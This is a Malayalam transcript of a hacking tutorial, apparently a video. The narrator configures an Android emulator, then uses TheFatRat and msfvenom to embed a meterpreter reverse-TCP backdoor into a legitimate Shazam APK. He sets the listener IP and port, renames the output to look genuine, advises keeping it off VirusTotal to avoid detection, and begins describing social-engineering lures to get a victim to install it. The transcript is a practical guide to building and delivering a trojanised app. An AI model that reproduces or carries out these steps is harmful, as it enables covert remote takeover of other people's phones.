സെറ്റിംഗ് നമുക്ക് ചെയ്യാനുള്ളത്, ഇതിൽ ഓരോ സെറ്റിംഗ് ചെയ്യുമ്പോഴും സ്വാഭാവികമായിട്ടും നമ്മളോട് ആപ്ലിക്കേഷൻ റീസ്റ്റാർട്ട് ചെയ്യാൻ പറയും. ഓക്കെ, അപ്പം അത് ഓരോ തവണ എന്ത് ചെയ്യണം, സെറ്റിങ്സ് സേവ് ചെയ്യുന്നതിനനുസരിച്ചിട്ട് ആപ്ലിക്കേഷൻസ് റീസ്റ്റാർട്ട് ചെയ്യേണ്ടി വരും. ദെൻ പിന്നെ വരുന്നൊരു കാര്യമാണ് ഇവിടെ റൂട്ട് പെർമിഷൻ, അത് എനബിൾ ആക്കി കൊടുക്കുക. അത് ഡിസബിൾ ആയിട്ടായിരിക്കും നിങ്ങളിൽ കിടക്കുന്നുണ്ടാവുക, അത് എനബിൾ ആക്കി കൊടുക്കുക. അതേപോലെ ADB ഡീബഗ്ഗിങ് എനബിൾ ലോക്കൽ കണക്ഷൻ എന്നും സെറ്റ് ചെയ്ത് വെച്ചേക്കുക. ഓക്കെ, ഇത്രയും കാര്യങ്ങൾ നിർബന്ധമായിട്ടും ചെയ്തിരിക്കണം. ADB ഡീബഗ്ഗിങ് എനബിൾ ലോക്കൽ കണക്ഷൻ, ഈ ഒരു കാര്യം കൂടി സെറ്റ് ചെയ്ത് വെക്കുക. ദെൻ ഓക്കെ, ഇത്രയേ ഉള്ളൂ പ്രധാനപ്പെട്ടത്. ഇത്രയും കാര്യങ്ങളും സെറ്റ് ചെയ്താൽ മതി. പിന്നെ സ്വാഭാവികമായിട്ട് CPU എത്ര കൊടുക്കണം എന്നുള്ളതാണ്. നമ്മളുടെ കമ്പ്യൂട്ടറിനനുസരിച്ച് കപ്പാസിറ്റി ഉള്ളത് കൊടുത്താൽ മതി. മിനിമം ഒരു 4 എണ്ണം മതി. ഓക്കെ, RAM ആണെന്നുണ്ടെങ്കിൽ മിനിമം ഒരു 4 GB കൊടുക്കുക. ഓവറായിട്ട് കൊടുക്കേണ്ട ആവശ്യമൊന്നുമില്ല. ഇതിൽ നമ്മൾ ജസ്റ്റ് ഒന്ന് അത്ര വലിയൊരു കപ്പാസിറ്റി വേണ്ടാത്തൊരു ആപ്ലിക്കേഷനാണ് LD പ്ലെയർ എന്ന് പറയുന്നത്, ഒരു എമുലേറ്റർ ആണ്. ഓക്കെ, വേറെ സെറ്റിങ്സ് ഒന്നുമില്ല. ഇത്രയും ഒക്കെ കറക്റ്റ് ആക്കിയതിന് ശേഷം സ്ക്രീൻ സൈസ് വേണമെന്നുണ്ടെങ്കിൽ ഇവിടെ ചേഞ്ച് ചെയ്യാം കേട്ടോ, അത് ആവശ്യമില്ല. ഇത്രയും സെറ്റ് ആക്കിയതിന് ശേഷം നിങ്ങൾ എന്ത് ചെയ്യുക, സേവ് സെറ്റിങ്സ് എന്ന് കൊടുക്കുക. അപ്പം ഉറപ്പായിട്ടും എന്ത് ചെയ്തിരിക്കണം, നെറ്റ്വർക്ക് അഡാപ്റ്റർ ബ്രിഡ്ജഡ് അഡാപ്റ്റർ തന്നെ ആക്കണം. ദെൻ നമ്മൾ സാധാരണ രീതിയിൽ വൈഫൈ ഓപ്പൺ ആക്കുന്ന പോലെ ഇവിടെ പ്രസ് ചെയ്ത് പിടിക്കുക. എന്നിട്ട് സെറ്റിങ്സിൽ ഇതിൻ്റെ IP എന്താണെന്ന് നോക്കി വെക്കുക. ഓക്കെ, IP നമുക്കൊരു 192 റേഞ്ചിൽ ആയിരിക്കണം കിട്ടേണ്ടത്, കാരണം നമ്മൾ ബ്രിഡ്ജഡ് അഡാപ്റ്റർ ആണല്ലോ സെറ്റ് ചെയ്തത്. ഓക്കെ, അപ്പോൾ എൻ്റെ IP അഡ്രസ് നോക്കി 192.168.1.17. അത് തന്നെയാണ് എൻ്റെ നെറ്റ്വർക്ക് IP ആയിട്ടും വരുന്നത്, IP config. ഓക്കെ, ഇവിടെ ഞാൻ നോക്കുന്ന സമയത്തും എൻ്റെ വിൻഡോസിൻ്റെ IPയും കണ്ടോ, അത് തന്നെയാണ് കാണിക്കുന്നത്. അപ്പോൾ എന്താണ് ഇത്, അത് തന്നെയല്ല, അതേ റേഞ്ചാണ് കാണിക്കുന്നത്. 192.168.1.13 ആണ്, ഇത് 1.17 ആണ്. ഓക്കെ, അപ്പോൾ എന്താണ്, ഇത് ബ്രിഡ്ജഡ് അഡാപ്റ്ററിലേക്ക് വന്നിട്ടുണ്ട് എന്ന് മനസ്സിലാക്കുക. ഇനി ഇപ്പോൾ നമ്മൾ എന്ത് ചെയ്തു, LD പ്ലെയർ സെറ്റ് ചെയ്തു. ഇനി LD പ്ലെയറിൽ ഇൻസ്റ്റാൾ ചെയ്യാനുള്ള മാൽവെയർ നമ്മൾ ഇപ്പോഴും ക്രിയേറ്റ് ചെയ്തിട്ടില്ല. ഇനി നമ്മൾ എന്താണ്, അടുത്തത് മാൽവെയർ ആണ് ക്രിയേറ്റ് ചെയ്യാൻ പോകുന്നത്. ദെൻ നമ്മളുടെ കാലിലേക്ക് തിരിച്ചു വരിക. നമ്മൾ നേരത്തെ ഇൻസ്റ്റാൾ ചെയ്തിരിക്കുന്ന ഫാറ്റ് റാറ്റ് നമ്മൾ റൺ ചെയ്യാം. ഓക്കെ, ഫാറ്റ് റാറ്റ് റൺ ചെയ്യുമ്പോൾ ശ്രദ്ധിക്കുക, നമ്മൾ sudo സൂപ്പർ യൂസറിലായിരിക്കണം ഫാറ്റ് റാറ്റ് റൺ ചെയ്യേണ്ടത്. ഫാറ്റ് റാറ്റ് ഓക്കെ, ചെക്ക് ചെയ്യാണ് ഓരോ ടൂളുകളൊക്കെ ഇൻസ്റ്റാൾഡ് അല്ലേ എന്നുള്ളൊരു കാര്യം ചെക്ക് ചെയ്ത് നോക്കുകയാണ്. ഔട്ട്പുട്ട് എവിടെയാണ് സ്റ്റോർ ചെയ്യുന്നത് നോക്കണം. നമ്മൾ സെറ്റ് ചെയ്തിരിക്കുന്നത് ഹോം കാലി ടൂൾസ് ഫാറ്റ് റാറ്റ് ഫയൽസ് എന്ന് പറയുന്ന ഒരു ഫോൾഡറിലാണ്. ദെൻ അത് ഓപ്പൺ ആയി. അത് ഓപ്പൺ ആയപ്പോൾ ഒരു കാര്യം പറയുന്നുണ്ട്, ഡോണ്ട് അപ്ലോഡ് ടു വൈറസ് ടോട്ടലിലേക്ക് ഇത് അപ്ലോഡ് ചെയ്യരുതെന്ന് പറയുന്നുണ്ട്. കാരണം നമ്മൾ ക്രിയേറ്റ് ചെയ്യുന്ന മാൽവെയർ ആണ്. വൈറസ് ടോട്ടൽ എന്താ ചെയ്യുന്നത്, മാൽവെയറുകളെയൊക്കെ ലേൺ ചെയ്യുന്ന ഒരു പ്ലാറ്റ്ഫോമും കൂടിയാണ്. അത് മറ്റുള്ളവർക്ക് കാണിച്ചും കൊടുക്കും. അപ്പം ഈ ഒരു ആപ്ലിക്കേഷൻ ഒരിക്കലും മാൽവെയർ ആയ ഒരു ആപ്ലിക്കേഷൻ വൈറസ് ടോട്ടൽ ഇട്ട് കഴിഞ്ഞാൽ അത് മാൽവെയർ ആണെന്നുള്ളൊരു കാര്യം അവരവിടെ ലേൺ ചെയ്ത് വെക്കും. അതുകൊണ്ടാണ് പറയുന്നത് അവിടേക്ക് കൊടുക്കരുത്, അപ്ലോഡ് ചെയ്യരുത്. ഓക്കെ, ദെൻ ഫാറ്റ് റാറ്റ് ഓപ്പൺ ആയി. ഇനി നമുക്ക് എന്ത് ചെയ്യണം, ഇതിൽ ഒരുപാട് ഓപ്ഷൻസ് ഉണ്ട്. നമ്മൾ ജസ്റ്റ് ഒരു ബാക്ക് ഡോർ ക്രിയേറ്റ് ചെയ്യുന്നത്. ബാക്ക് ഡോർ എന്ന് പറഞ്ഞാൽ എന്താണ്, നമ്മളൊരു അപ്ലിക്കേഷനോ അല്ലെങ്കിൽ ഒരു സിസ്റ്റത്തിൻ്റെ ഒരു കമ്പ്യൂട്ടറിൻ്റെയോ മറ്റൊരു റിമോട്ട്ലി നമ്മൾ കൺട്രോൾ ചെയ്യാം.
അതിൽ ഏതെങ്കിലും ഒരു വൾണറബിലിറ്റി യൂസ് ചെയ്തുകൊണ്ട് ആ സിസ്റ്റത്തിന് നമ്മൾ ബാക്ക് ഡോർ പിന്നിലൂടെ നമ്മൾ എന്ത് ചെയ്യുക, അത് കൺട്രോൾ ചെയ്യുക എന്ന് പറഞ്ഞു കഴിഞ്ഞാൽ ഏതെങ്കിലും ഒരു വൾണറബിലിറ്റി യൂസ് ചെയ്തുകൊണ്ട് നമ്മൾ എന്ത് ചെയ്യുന്നു, റിമോട്ട്ലി മറ്റൊരു സ്ഥലത്ത് നിന്നുകൊണ്ട് ആ ഡിവൈസിനെ കൺട്രോൾ ചെയ്യാം. അപ്പോൾ അതിന് വേണ്ടിയിട്ടുള്ള മലീഷ്യസ് കോഡാണോ ക്രിയേറ്റ് ചെയ്യേണ്ടത്? അപ്പോൾ അവിടെ യൂസ് ചെയ്യുന്നത് എന്താണ്, MSF വെനം എന്ന് പറയുന്ന മലീഷ്യസ് കോഡ് ജനറേറ്റർ അല്ലെങ്കിൽ പേലോഡ് ജനറേറ്റ് ചെയ്യാനുള്ള ഒരു ടൂളാണ് MSF വെനം. അപ്പോൾ MSF വെനം യൂസ് ചെയ്തുകൊണ്ട് നമുക്ക് എന്ത് ചെയ്യും, ഒരു മലീഷ്യസ് കോഡ് ഉണ്ടാക്കി കാണാൻ പറ്റും. ഓക്കെ, അതേപോലെ ഇവിടെ കുറേ ആക്ഷൻസ് പറയുന്നുണ്ട്. നമ്മൾ ഇതിൽ ചൂസ് ചെയ്യുന്ന ഏതാണ്, 5ാമത്തെ ഓപ്ഷനാണ് ബാക്ക് ഡോറിങ് ഒറിജിനൽ APK. ഒറിജിനൽ അപ്ലിക്കേഷന്റെ ഉള്ളിൽ നമ്മൾ എന്ത് ചെയ്യുന്നു, ഒരു ബാക്ക് ഡോർ സെറ്റ് ചെയ്യുന്നു, മലീഷ്യസ് കോഡ് സെറ്റ് ചെയ്ത് അയക്കുന്നു. അപ്പോൾ അത് എന്താണ്, കുറച്ചുകൂടി ജെനുവിനിറ്റി കൂടുതലാണ്. അപ്പോൾ നമ്മൾ ഇവിടെ എന്ത് ചെയ്യുന്നു, 5 എന്ന് സെലക്ട് ചെയ്യുന്നു. ഓക്കെ, നമ്മൾ ചെയ്യാൻ പോകുന്നത് ഒറിജിനൽ അപ്ലിക്കേഷന്റെ ഉള്ളിൽ മലീഷ്യസ് കോഡ് ആഡ് ചെയ്യുന്നു. ഓക്കെ, ഞാൻ 5 എന്ന് സെലക്ട് ചെയ്തു. ഓക്കെ, ഇനി ഐ പി സെറ്റ് ചെയ്യണം. എന്തിനാണ്, നമ്മൾ ഈ ഒരു അപ്ലിക്കേഷൻ നമ്മൾ എന്ത് ചെയ്യണം, നമ്മളുടെ ടാർഗറ്റിൽ ഇൻസ്റ്റാൾ ചെയ്തതിന് ശേഷം അവിടെ നിന്ന് നമ്മളുടെ കമ്പ്യൂട്ടറിലേക്ക് കണക്ഷൻ വരണം. ഓക്കെ, അതിന് നമ്മൾ പറയും റിവേഴ്സ് കണക്ഷൻ എന്ന് പറയും. ഓക്കെ, നമ്മളുടെ കമ്പ്യൂട്ടറിൽ നിന്ന് നമ്മൾ അങ്ങോട്ട് കണക്ഷൻ ചോദിക്കുമ്പോൾ കിട്ടിക്കൊള്ളണമെന്നില്ല, അല്ലെങ്കിൽ നമ്മൾ ഒരാളെ അങ്ങോട്ട് ഹാക്ക് ചെയ്യുമ്പോൾ കുറേ റെസ്ട്രിക്ഷൻസ് ഉണ്ടാകും. അത് ഒഴിവാക്കാൻ വേണ്ടിയിട്ട് നമ്മൾ എന്ത് ചെയ്യുന്നു, അവിടുന്ന് ഇങ്ങോട്ട് കണക്ഷൻ എടുപ്പിക്കുന്നു. അപ്പം ഈ ഒരു അപ്ലിക്കേഷൻ ഇൻസ്റ്റാൾ ചെയ്യുന്നതോടുകൂടി അവരുടെ മൊബൈൽ ഫോൺ എന്ത് ചെയ്യും, നമ്മളുടെ കമ്പ്യൂട്ടറിലേക്ക് ഇങ്ങോട്ട് കണക്ഷൻ ചോദിച്ചു വരും. അപ്പോൾ ഇങ്ങോട്ട് വരണമെന്നുണ്ടെങ്കിൽ നമ്മളൊരു IP അഡ്രസ്സ് പറഞ്ഞു കൊടുക്കണം, നമ്മളുടെ ഡിവൈസിൻ്റെ IP അഡ്രസ്സ് പറഞ്ഞു കൊടുക്കണം. ഞാൻ എന്ത് ചെയ്യുന്നു, പുതിയൊരു ടാബ് എടുത്തിട്ട് നമ്മളുടെ ഡിവൈസിൻ്റെ IP അഡ്രസ്സ് ifconfig, അത് അവിടെ തന്നെ അവർ കാണിച്ചു തരുന്നുണ്ട്. 15ഉം അതേപോലെ 16ഉം ഞാൻ 2 എതർനെറ്റ് ഇപ്പോൾ യൂസ് ചെയ്യുന്നുണ്ട്, അല്ലെങ്കിൽ 2 അഡാപ്റ്റർ ഈ ഒരു കാലിയിൽ നെക്സ്റ്റിൽ ഞാൻ യൂസ് ചെയ്യുന്നുണ്ട്. അതിവിടെ കാണാൻ പറ്റും. നെറ്റ്വർക്കിൽ ഇവിടെ 2 ഞാൻ യൂസ് ചെയ്യുന്നുണ്ട്. ഓക്കെ, അപ്പോൾ നമുക്കിതിൽ ഏതെങ്കിലും ഒന്ന് സെറ്റ് ചെയ്യാം. അപ്പോൾ അവിടെ 16 ഉണ്ട്. അപ്പോൾ ഞാൻ എന്ത് ചെയ്യുന്നു, 16 തന്നെ എടുത്തു. ജസ്റ്റ് അതൊന്ന് എന്ത് ചെയ്യാം, കോപ്പി ചെയ്തു ഇവിടെ കൊണ്ടുവന്നിട്ട് പേസ്റ്റ് ചെയ്തു. IP നമ്മൾ സെറ്റ് ചെയ്തു. ഓക്കെ, ഇനി കമ്പ്യൂട്ടറിൽ ഒരുപാട് പോർട്ടുകൾ ഉണ്ട്. ഒരു കമ്പ്യൂട്ടറിലേക്ക് നമ്മൾ കണക്ഷൻ എടുക്കുക അല്ലെങ്കിൽ ഒരു ഡിവൈസിലേക്ക് കണക്ഷൻ എടുക്കുക എന്ന് പറയുമ്പോൾ ഈ പറയുന്ന പോർട്ടുകളിലൂടെയാണ് നമ്മൾ കണക്ട് ചെയ്യുന്നത്. നമുക്കറിയാലോ, കമ്പ്യൂട്ടറിന് ഫിസിക്കൽ പോർട്ടുകൾ ഉള്ളതുപോലെ തന്നെ കമ്പ്യൂട്ടറിന് കുറേ വിർച്വൽ പോർട്ടുകളുണ്ട്. 0 മുതൽ 6535 വിർച്വൽ പോർട്ടുകൾ നമ്മുടെ മൊബൈൽ ആവട്ടെ ഏതൊരു ഡിവൈസ് ആവട്ടെ അതിന് ചുറ്റും ഉണ്ട്. ഓക്കെ, പോർട്ടുകൾ എന്ന് പറഞ്ഞാൽ വാതിലുകൾ പോലെയാണ്. ആ ഡിവൈസിന്റെ ഉള്ളിലേക്കുള്ള എൻട്രി പോയിന്റ് അതുവഴിയാണ്. ഇപ്പോൾ ഉദാഹരണത്തിന് നമ്മൾ മൊബൈലിലേക്ക് സിനിമ കയറ്റണം, ഒരു USB കേബിൾ ഉപയോഗിച്ചുകൊണ്ട് നമ്മൾ എന്ത് ചെയ്യാറുണ്ട്, കമ്പ്യൂട്ടറിന്റെ USB പോർട്ടിൽ കണക്ട് ചെയ്തുകൊണ്ട് നമ്മളുടെ മൊബൈലിന്റെ പോർട്ടിലേക്കും കണക്ട് ചെയ്ത് അങ്ങനെ ഒരു മൂവി സെൻഡ് ചെയ്യാറുണ്ട്. അതേപോലെ തന്നെ കമ്പ്യൂട്ടറിൽ നമ്മൾ കാണാത്ത കുറെ വിർച്വൽ പോർട്ടുകളുണ്ട്. അതിന്റെ നമ്പറാണ് പറയുന്നത് 0 മുതൽ 6535. അതിൽ 4 അക്കം വരുന്ന പോർട്ട് നമ്പറുകൾ, ഒരു നമ്പർ എന്ത് ചെയ്യുക, ഇവിടെ കൊടുക്കുക. കാരണം നമ്മുടെ കമ്പ്യൂട്ടറിന്റെ ആ ഒരു പോർട്ട് വഴിയാണ് അവരെന്ത് ചെയ്യുന്നത്, അകത്ത് വരുന്നത്. ഓക്കെ, നമ്മൾ ആ ഒരു മലീഷ്യസ് കോഡ് അവരുടെ മൊബൈലിൽ അവർ ഇൻസ്റ്റാൾ ചെയ്ത് കഴിഞ്ഞാൽ അവരുടെ മൊബൈൽ എന്ത് ചെയ്യും, ഓട്ടോമാറ്റിക് ആയിട്ട് നമ്മളുടെ കമ്പ്യൂട്ടറിലേക്ക് കണക്ട് ചെയ്യണമല്ലോ. കണക്ട് ചെയ്യണമെങ്കിൽ നമ്മളൊരു വാതിൽ തുറന്നു വെക്കണം. ഓക്കെ, ആ വാതിൽ നമ്പറാണ് അല്ലെങ്കിൽ ആ ഒരു പോർട്ട് നമ്പർ നമ്മൾ എന്ത് ചെയ്യുന്നു, കൊടുക്കുന്നു. ഞാനിവിടെ കൊടുക്കുന്നു 5454. ഓക്കെ, കാരണം ഞാൻ പറഞ്ഞു ഒരു 4 അക്ക നമ്പർ കൊടുക്കുക. 6535 ഏത് നമ്പറും കൊടുക്കാം. പക്ഷെ ചില പോർട്ടുകളൊക്കെ ഡീഫാൾട്ട് ആയിട്ട് വേറെ ഒരുപാട് കാര്യങ്ങൾ സെറ്റ് ചെയ്ത് വെച്ചിട്ടുണ്ട്. അതൊക്കെ ഒരു ഡീറ്റെയിൽ ടോപ്പിക്കാണ്, നമ്മൾ അതിലേക്കൊന്നും പോകുന്നില്ല. നിങ്ങൾ എന്ത് ചെയ്യുക, ഒരു 4 അക്ക നമ്പർ ഇവിടെ കൊടുക്കുക. അപ്പം ഞാൻ അതും കൊടുത്തു. ഈ നമ്പറുകൾ ഓർത്ത് വെക്കണം കേട്ടോ, ഈ നമ്പർ ഓർത്ത് വെക്കണം, ഇത് നമുക്കിനി ആവശ്യമുണ്ട്. ദെൻ എൻ്റർ അടിച്ചു. ഇനി നമുക്ക് എന്ത് വേണം, മലീഷ്യസ് കോഡ് ആഡ് ചെയ്യണമെന്നുണ്ടെങ്കിൽ ആദ്യം നമുക്കൊരു ജെനുവിൻ അപ്ലിക്കേഷൻ വേണം. ജെനുവിൻ അപ്ലിക്കേഷന്റെ ഉള്ളിലേക്കാണ് നമ്മൾ മലീഷ്യസ് കോഡ് ആഡ് ചെയ്യുന്നത്. ഓക്കെ, ഞാൻ ഇവിടെ എന്ത് ചെയ്തിട്ടുണ്ട്, ഡെസ്ക് ടോപ്പിൽ അപ്ലിക്കേഷൻ കൊണ്ടുവന്ന് വെച്ചിട്ടുണ്ട്. LS, നിങ്ങൾക്ക് ഇഷ്ടമുള്ള ഒരു അപ്ലിക്കേഷൻ നിങ്ങൾക്ക് ഡൗൺലോഡ് ചെയ്യാം കേട്ടോ. ഞാൻ പറഞ്ഞു ഏതെങ്കിലും ഒരു APK ഫയൽ നിങ്ങൾ എന്ത് ചെയ്യണം, ഇതുപോലെ ഡൗൺലോഡ് ചെയ്ത് വെക്കണം. അപ്ലിക്കേഷൻസ് എടുക്കാൻ മാക്സിമം നോക്കുക. ഓക്കെ, ഇവിടെ സെർച്ച് ചെയ്തിട്ട് നമുക്ക് നോക്കാം ഏതൊക്കെയാണ്, ഏതെങ്കിലും ലൈറ്റ് എന്നുള്ള പേരിൽ അപ്ലിക്കേഷൻസ് ഉണ്ടോ, അങ്ങനെ നമുക്ക് ഇഷ്ടമുള്ള ഏതെങ്കിലും ആപ്ലിക്കേഷൻ എടുക്കാം. ഈ ഒരു പ്ലാറ്റ്ഫോം മാത്രമല്ല, APK സം ഉണ്ട്, APK മിറർ എന്ന് പറയുന്ന ഒരു പ്ലാറ്റ്ഫോം ഉണ്ട്. അവിടെ നിന്നൊക്കെ നിങ്ങൾക്ക് എന്ത് ചെയ്യാം, APK ഫയൽസ് ഡൗൺലോഡ് ചെയ്യാം. ടെലഗ്രാം ബോർഡ്സുകൾ ഉണ്ട്. ഓക്കെ, ദെൻ ഞാൻ അവിടെ ഓൾറെഡി ഡൗൺലോഡ് ചെയ്ത് വെച്ചിട്ടുണ്ട്. ദെൻ shazam.apk ഞാൻ എന്ത് ചെയ്തു, ആ പാത്ത് ഞാൻ കോപ്പി ചെയ്തു. അപ്പം ഈ ഒരു ഡെസ്ക് ടോപ്പ് എന്ന് പറയുന്ന ഫോൾഡറിന്റെ ഉള്ളിലാണല്ലോ ഈ shazam.apk ഉള്ളത്. അപ്പോൾ ഞാൻ എന്ത് ചെയ്തു, ഡെസ്ക് ടോപ്പ് വരെയുള്ള പാത്തും ഞാൻ കോപ്പി ചെയ്തു. PWD അടിച്ചു കഴിഞ്ഞാൽ പ്രസന്റ് വർക്കിംഗ് ഡയറക്ടറി, ഇതിപ്പോൾ എവിടെയാണ് ലൊക്കേഷൻ എന്നുള്ളത് കാണിച്ചു തരും. ഞാനത് കോപ്പി ചെയ്ത് ഇവിടെ വെച്ചു. ഫ്ലാഷ് ഇട്ടിട്ട് ഫയൽ ഏതാണ്, shazam.apk എന്നുള്ളതാണ്. അതും ഞാൻ കോപ്പി ചെയ്തു, പേസ്റ്റ് ചെയ്ത് വെച്ചു. ഓക്കെ, ദെൻ ഈ പാത്ത് ഞാൻ എന്ത് ചെയ്തു, കോപ്പി ചെയ്തു മൊത്തത്തിൽ.
കാരണം ആ ഫയലിലേക്ക് എൻ്റെ കമ്പ്യൂട്ടറിലുള്ള എക്സാക്ട് പാത്ത് ഇതാണ്. ഞാനിത് കോപ്പി ചെയ്തു, Ctrl+Shift+C Ctrl+Shift+V കോപ്പി പേസ്റ്റ് കേട്ടോ. ദെൻ ഞാൻ അതിവിടെ പേസ്റ്റ് ചെയ്തു. ഓക്കെ, ഞാനിപ്പോൾ എന്ത് ചെയ്തു, ആ ആപ്ലിക്കേഷൻ ആഡ് ചെയ്ത് കൊടുത്തു. ഇനി എന്നോട് ചോദിക്കുകയാണ് ഏത് ബാക്ക്ഡോർ കോഡാണ്, ഏത് മലീഷ്യസ് കോഡാണ് ഞാൻ കൊടുക്കേണ്ടത്. ഓക്കെ, നമ്മൾ എന്താ ചെയ്യുന്നത്, ആൻഡ്രോയിഡ് ഫോണിനെ കൺട്രോൾ ചെയ്യാനാണ്. അപ്പൊ നമുക്ക് ഒരു മൊബൈലിനെ റിമോട്ട്ലി കൺട്രോൾ ചെയ്യാൻ നമ്മൾ TCP കണക്ഷൻസ് ആണ് യൂസ് ചെയ്യുക. ഓക്കെ, വെറും അവരുടെ വെബ് പേജ് മാത്രം കിട്ടിയാൽ പോരാ നമുക്ക്, അല്ലെങ്കിൽ അവരുടെ HTTP സർവീസ് മാത്രം കിട്ടിയാൽ പോരാ, നമുക്ക് അവരുടെ ഫുൾ സർവീസ് കിട്ടണമെന്നുണ്ടെങ്കിൽ TCP കണക്ഷൻ ആണ് ഞാൻ ചൂസ് ചെയ്യുന്നത്. അപ്പൊ ഞാൻ എന്ത് ചെയ്യുന്നു, ഇതിൽ മൂന്നാമത്തത് ഓക്കെ, ആൻഡ്രോയിഡ് മീറ്റർ പീറ്റർ റിവേഴ്സ് TCP എന്നുള്ളത് ഞാൻ സെലക്ട് ചെയ്തു, 3 കൊടുത്തു. ഇനി അവിടെ ചോദിക്കുകയാണ്, ഞാൻ മൂന്നാമത്തെ പേലോഡാണ് ചൂസ് ചെയ്തത്, അത് അപ്ലിക്കേഷന്റെ കൂടെ എന്ത് ചെയ്യണം, എംബഡ് ചെയ്യണം. MSF Venom യൂസ് ചെയ്തിട്ട് അതെന്ത് ചെയ്യണം, APK-യിൽ എംബഡ് ചെയ്യണം. അപ്പൊ ഞാൻ എന്ത് ചെയ്യുന്നു, ഇവിടെയും മൂന്നാമത്തെ ഓപ്ഷൻ ഞാൻ എന്ത് ചെയ്തു, സെലക്ട് ചെയ്തു. അപ്പൊ ഇവരെന്ത് ചെയ്യും, MSF Venom ഉപയോഗിച്ചുകൊണ്ട്, ഞാൻ കാണിച്ചു തരട്ടെ, ഇത് ഈ പ്രോസസ്സിന്റെ ഇടയ്ക്ക് ഞാൻ കാണിച്ചു തരാം, MSF Venom ഉപയോഗിച്ചുകൊണ്ട് എങ്ങനെയാണ് മലീഷ്യസ് കോഡ് ഉണ്ടാക്കുന്നത് അല്ലെങ്കിൽ മലീഷ്യസ് ഫയൽ ഉണ്ടാക്കുന്നത് എന്നുള്ളത്. ഓക്കെ, അപ്പം ഇവിടെ എന്താണ്, MSF Venom യൂസ് ചെയ്തുകൊണ്ടാണ് നമ്മൾ ഈ ഒരു മലീഷ്യസ് കോഡ് ആഡ് ചെയ്യുന്നത് എന്നുള്ളൊരു കാര്യം ഞാൻ ഇവിടെ സെറ്റ് ചെയ്ത് കൊടുത്തു. 3 എന്ന് സെലക്ട് ചെയ്തു. ദെൻ ബാക്ക്ഗ്രൗണ്ടിൽ ഇപ്പൊ എന്താണ് ചെയ്യുന്നത്, ഒറിജിനൽ APK, നമ്മൾ ക്രിയേറ്റ് ചെയ്ത ഒറിജിനൽ APK ഉണ്ടായിരുന്നല്ലോ, ആ ഒറിജിനൽ APK എന്ന് പറഞ്ഞാൽ shazam.apk എന്ന് പറയുന്ന ഒരു APK ഫയൽ ഉണ്ടായിരുന്നല്ലോ, ആ APK ഫയലിനെ എന്താക്കി മാറ്റും, ഡീബഗ് ചെയ്തുകൊണ്ട് അതിന്റെ കോഡ് എടുക്കും. അതേ സമയത്ത് തന്നെ എന്തും ചെയ്യും, ഒരു മലീഷ്യസ് APK ക്രിയേറ്റ് ചെയ്തിട്ടുണ്ടാകും, അതിന്റെ കോഡും എടുക്കും, ഈ 2 കോഡും ഒരുമിച്ച് വെക്കും, എന്നിട്ട് അതിന് വീണ്ടും ബൈൻഡ് ചെയ്തുകൊണ്ട് പുതിയൊരു APK ആക്കി അവർ സേവ് ചെയ്തു. എന്താണ് ആ പുതിയ APKന്റെ പേര് നോക്കിയേ, app.backdoored.apk എന്ന് പറഞ്ഞ് എൻ്റെ കമ്പ്യൂട്ടറിൽ അത് സ്റ്റോർ ചെയ്ത് വെച്ചിട്ടുണ്ട്. ഓക്കെ, ദെൻ ഈ ഒരു സെറ്റിംഗ് നിങ്ങൾ സേവ് ചെയ്ത് വെക്കണമെന്ന് ചോദിക്കുന്നുണ്ട്. അത് വേണമെങ്കിൽ കൊടുത്താൽ മതി, അല്ലെങ്കിൽ അതിന്റെ ആവശ്യമില്ല. ഞാൻ ജസ്റ്റ് അത് നോ എന്ന് കൊടുത്തു. ഇപ്പൊ എന്തായിട്ടുണ്ട്, എൻ്റെ ബാക്ക്ഡോർ ആപ്ലിക്കേഷൻ APK ഫയൽ ജനറേറ്റ് ആയിട്ടുണ്ട്. നമുക്കത് നോക്കാം ഏത് ലൊക്കേഷനിലാണ്, കാലി ടൂൾസിൽ. ഓക്കെ, ദെൻ ഞാൻ എന്ത് ചെയ്തു, CD ടൂൾസ് പാട്രാറ്റ് ഫയൽസ്. ഓക്കെ, അവിടെ ഇതാക്കണ് ആ ഒരു ഫയൽ ക്രിയേറ്റ് ആയിട്ടുണ്ട്. ഇതാണ് മലീഷ്യസ് ഫയൽ. ഇത് ഏതാണ് ആപ്ലിക്കേഷൻ, നമ്മളുടെ shazam.apk തന്നെയാണ് ഈ ഫയൽ. ഓക്കെ, അതിപ്പോ എന്തായിട്ടുണ്ട്, അതിലേക്ക് മലീഷ്യസ് കോഡ് കൂടി ആഡ് ചെയ്ത് വെച്ചിട്ടുണ്ട്. ഇനി നമുക്ക് എന്ത് ചെയ്യാം, ഇത് ഇങ്ങനെ കൊടുത്തു കഴിഞ്ഞാൽ നമ്മളുടെ വിക്ടിമിന് ഇത് മനസ്സിലാകും, എന്തൊരു ഡൗട്ട് അടിക്കും. അതുകൊണ്ട് നമ്മൾ ഇതിന്റെ പേര് മാറ്റിയിട്ട് പഴയ പോലെ ആക്കുന്നു. ആപ്ഡോർ കൊടുത്തു, ദെൻ ഷസം പേര് ഞാൻ മാറ്റി, ഷസം ലൈറ്റ് എന്ന് വേണമെങ്കിൽ കൊടുക്കാം, അല്ലെങ്കിൽ ഷസം എന്നാക്കിയാലും മതി. ഷസം ലൈറ്റ് .apk. ഓക്കെ, ഞാൻ ആ ഫയലിന്റെ പേര് മാറ്റിയെന്നേ ഉള്ളൂ. കണ്ടോ, ഇങ്ങനെ ഒരു പേര് കാണുന്നതിനേക്കാളും നല്ലത് ഷസം എന്നുള്ളൊരു ആപ്ലിക്കേഷൻ ആണല്ലോ. അപ്പൊ എന്താക്കി, ഈ ഫയൽ നമ്മളിവിടെ ക്രിയേറ്റ് ചെയ്ത് വെച്ചു. ഇനി നമുക്ക് എന്ത് ചെയ്യണം, ഈ ഫയൽ ടാർഗറ്റിന്റെ കമ്പ്യൂട്ടറിൽ അല്ലെങ്കിൽ മൊബൈലിലേക്ക് എത്തിക്കണം. ഒന്നില്ലെങ്കിൽ ഇവിടെ നമുക്ക് സോഷ്യൽ എഞ്ചിനീയറിംഗ് മെത്തേഡ്സ് യൂസ് ചെയ്യാം. എന്തെങ്കിലുമൊക്കെ ലിങ്കിന്റെ കൂടെ വെച്ച് കൊടുത്തിട്ട് ഇത് ഡൗൺലോഡ് ചെയ്താൽ ഇത്ര കിട്ടും, അല്ലെങ്കിൽ ഇത് ഇന്ന ആപ്ലിക്കേഷൻ ആണ്, അല്ലെങ്കിൽ പറയാം ഇത് ഷസത്തിന്റെ ലേറ്റസ്റ്റ് ആപ്ലിക്കേഷൻ ആണ് എന്നൊക്കെ പറഞ്ഞിട്ടൊക്കെ 